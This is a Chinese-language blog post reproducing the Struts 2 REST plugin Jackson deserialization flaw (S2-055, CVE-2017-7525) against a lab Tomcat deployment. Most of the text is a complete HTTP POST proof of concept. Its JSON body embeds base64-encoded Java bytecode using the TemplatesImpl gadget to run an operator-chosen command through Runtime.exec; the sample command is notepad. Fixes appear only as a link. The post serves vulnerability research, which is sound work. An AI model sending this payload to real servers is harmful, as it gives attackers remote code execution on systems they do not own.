【漏洞利用】S2-055 反序列化漏洞 CVE-2017-7525 # 附 Poc

漏洞详情

https://secfree.com/article-587.html

概述

在今年4月17日的时候出过一个Jackson反序列化，貌似没有CVE编号，CNVD也只是安全公告CNTA-2017-0030  http://www.cnvd.org.cn/webinfo/show/4111，我在看雪论坛上当时找到一个Poc，但是经过测试，Poc存在很大的问题，不完整。

我和我的同事ahmatjan完成了这个Poc的构造。

同今年的12月1日被爆Apache Struts 2.5.x REST插件存在远程代码执行的中危漏洞。

参考了廖师傅的https://paper.seebug.org/473/这篇文章，和团队的Hucheat同学交流以后，参考了在看雪找到的的Poc代码，做的复现，也才有了这篇文章。

漏洞利用

漏洞环境：https://github.com/shengqi158/S2-055-PoC（基于rest-show-case改造的S2-055-PoC）

首先经过maven编译并导出war包，在tomcat下完成部署。

ExploitCommand.java类中输入command，并进行javac ExploitCommand.java编译，警告直接忽略。

构造Payload。

访问http://192.168.1.170:8080/struts2-rest-showcase/orders，并使用BurpSuite拦截一个请求包。

将ContentType设置为application/json，这样请求才会丢给Jackson处理，再复制Payload到BurpSuite中。

Poc：

POST /struts2-rest-showcase/orders HTTP/1.1
Host: 192.168.1.170:8080
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4F7AC2E1E05CAC59327C0593B4EFB9D5
If-None-Match: 1
Connection: close

{"clientName":["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",{"transletBytecodes":["yv66vgAAADMAXwoAFwAtCgAuAC8IADAKAC4AMQcAMgcAMwoANAA1CgAGADYKAAUANwcAOAoACgAtCgAFADkKAAoAOggAOwoACgA8CQA9AD4KAD8AQAgAQQcAQgoAEwBDBwBECgAVAC0HAEUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQANU3RhY2tNYXBUYWJsZQcARAcAMgcARgcARwcAOAcAQgEACkV4Y2VwdGlvbnMHAEgBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgcASQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApTb3VyY2VGaWxlAQATRXhwbG9pdENvbW1hbmQuamF2YQwAGAAZBwBKDABLAEwBAAdub3RlcGFkDABNAE4BABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyAQAZamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcgcARgwATwBQDAAYAFEMABgAUgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABTAFQMAFUAVgEAAQoMAFcAVAcAWAwAWQBaBwBbDABcAF0BABwKWypdIFBheWxvYWQgRnVjayBUb21jYXQhISEhAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAXgAZAQAWZXhwbG9pdC9FeHBsb2l0Q29tbWFuZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABFqYXZhL2xhbmcvUHJvY2VzcwEAEGphdmEvbGFuZy9TdHJpbmcBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAPcHJpbnRTdGFja1RyYWNlACEAFQAXAAAAAAAEAAEAGAAZAAIAGgAAAO8ABQAFAAAAbiq3AAEBTLgAAhIDtgAETbsABVm7AAZZLLYAB7cACLcACUwBTrsAClm3AAs6BCu2AAxZTsYAKhkEuwAKWbcACy22AA0SDrYADbYAD7YADVeyABAZBLYAD7YAEaf/07IAEBIStgARpwAITCu2ABSxAAEABABlAGgAEwACABsAAAA6AA4AAAANAAQAEAAGABIADwATACIAFQAkABYALQAXADYAGABPABkAXQAbAGUAHgBoABwAaQAdAG0AHwAcAAAAJwAE/wAtAAUHAB0HAB4HAB8HACAHACEAAC//AAoAAQcAHQABBwAiBAAjAAAABAABACQACQAlACYAAgAaAAAAJQACAAIAAAAJuwAVWbcAFkyxAAAAAQAbAAAACgACAAAAIgAIACMAIwAAAAQAAQAkAAEAJwAoAAIAGgAAABkAAAADAAAAAbEAAAABABsAAAAGAAEAAAAoACMAAAAEAAEAKQABACcAKgACABoAAAAZAAAABAAAAAGxAAAAAQAbAAAABgABAAAALgAjAAAABAABACkAAQArAAAAAgAs"],"transletName":"p","outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}]}

利用成功

修复方案

https://secfree.com/article-587.html

参考

https://paper.seebug.org/473/